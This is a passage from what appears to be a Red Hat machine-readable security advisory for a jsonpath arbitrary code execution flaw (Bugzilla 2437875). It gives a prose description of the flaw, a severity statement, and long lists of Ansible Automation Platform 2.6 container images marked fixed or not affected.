"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:f731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:fe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:e4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:f720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:b8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:f95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:3c83b77b1291ae9e3003b1eb16bcd1b21752733d5ea0b7f9193bea2ba9302215_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6d333bdef78bef7ba85b04a1a6c5d33591263371b5f740813efae68788e32a6c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:86ac843a55e47fa052c11f263a0ebf4f0c969cf5f60f62a5b88006c963f5b772_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:b77fba98853eb0fabcbcd4981c347cf909f50e64ea32f4c0d8313d89cdb48cf7_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:094676fb53084cc7ca93010b2667fde26a83c78bd84af7dfef86e27149fc2385_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:1ba54fa91703c8105080e534a74b85b257c0123abb87d9aa4c05f05e32c24c9b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:21582b96b79a5a1800ce288633970ed7303655e31a202993df84159d3dca7826_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:d6adc9bd2df9fded6228ddd5dbca3919991913b40fb95b12d4d01cf96c5f4d60_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:021da3e8a0a608ea02313825524721dbab07075edd667a26cfcb2f3d74ae2b18_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:0cf30ea331a045608d69ff66003f19434daa1940179fdae26256df39a9073f45_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:5eb3f34a73fc52d81224ce6633de758082fbae3b814416cf535d9dad3cd4945f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:92c85eabe94b95c63307991c3881acbd34a808c4f34ca57c66a97550ee51b884_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:09c46d65ccff80c987fca5c83abca6e63edce8080c2c7fb0ef4ac5401672c0e6_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:7dd3351792b16a58a6f1f113e01daaf42937fa0c951a1f25f543c83b1ae97e99_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:c1829492bde010feeb674e9c0f80dfea8746e8090c8ee142cde17dc3b2f5ad41_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f0e905a88c717e674b96a13545fbeda55c7cc265e0cda3ef8e01f9b06d18a478_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:01fd1e73fd125672778315487a4aa0ae13b7aac2b386d70facd7439d23ee0219_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:098cb05f8a5907e235746966a7918f03bf3a5d5435bc0b8dde7bf86460270fcc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:2f5e577618a35a303e6df205e764af46c2a12f17072d0c806d1b532a5fb1491e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:ed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:0b58c1f3d4fd2432ef54cc336f1ef6bd8862b264f90d7a98b593242ac710c76b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:1bd5776057ca0f4440a9bdb96caf67589f30e7e90ad5eb6003ba1544bd2956a1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:48216d04a33d8625ed1ae89581f29662e8820620227873d9b8200437c0634945_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a89fe49e49cfd10c9a11420eee13a1c813524524435b51a5d2ee729f4114b951_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:5fa148a59fbc353c61b41544f5947ea654625ea5343a97ab84193c314e72c4b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a0977954bab9f309fa6c248ed10cf9362e5f2fe1092ff1e7eddaf5c73ea5ce71_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a414eae477676d3ea422f07be4b3c5fe08c6090b7439a38a437e3ea83a2ecd54_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:d204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:46f1880b16c4455553bcbf6213f3097dc53a000249b8123d6689b1f5a88f698b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:a1a7fbf38343192e58709e13327a5becd211ae5177d75a185e0cd07c9391b57a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:d7f49d3167a98ac52aad4a34e039612ded06439cc3d2ed851fd6a5e88d175ac2_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:fad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:111c3fa869282760a7408db240e5fbddd74816fa5ffc12578c267427eae8eb96_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:20ceae5ef8be4bc9ccc0e0f3b495a7f3f3bf5ba790dc4f91d33b063457974ca6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:6c5f0d6ede717eb230efb7676cc320a96ab6667f81d8f0a52a22b5a3986de163_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:d17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:b3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:ccf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2437875"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the jsonpath component. This vulnerability allows a remote attacker to achieve arbitrary code execution by supplying a malicious JSON Path expression. The component\u0027s reliance on the `static-eval` module for processing user-supplied input leads to unsafe evaluation. Successful exploitation can result in Remote Code Execution (RCE) in Node.js environments or Cross-site Scripting (XSS) in browser contexts.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "jsonpath: jsonpath: Arbitrary Code Execution via unsafe JSON Path expression evaluation",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Red Hat Product Security team has rated this vulnerability as Important as it may allows arbitrary code execution when processing untrusted JSON Path expressions. This can lead to Remote Code Execution in Node.js environments or Cross-site Scripting in browser contexts. In some contexts it may be possible to remotely exploit this flaw without any privileges. However, within Red Hat products the jsonpath component is used as a transitive dependency or does not directly handle user input. This context reduces exposure and criticality of this vulnerability.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le"
],
"known_not_affected": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:f731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:fe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:e4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:f720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b_ppc64le",
